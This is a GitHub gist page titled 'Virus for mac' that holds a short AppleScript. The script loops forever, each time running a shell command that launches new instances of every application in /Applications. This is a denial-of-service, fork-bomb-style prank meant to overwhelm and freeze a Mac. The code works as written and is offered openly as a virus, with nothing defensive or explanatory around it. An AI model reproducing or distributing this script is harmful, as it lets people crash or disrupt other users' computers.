Skip to content

Instantly share code, notes, and snippets.

@muchanem
Last active October 21, 2016 08:32
Show Gist options
  • Save muchanem/f09559de9f018bf1941d to your computer and use it in GitHub Desktop.
Save muchanem/f09559de9f018bf1941d to your computer and use it in GitHub Desktop.
Virus for mac
repeat
tell application "Terminal"
do shell script "open -n /Applications/*.app"
end tell
end repeat
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment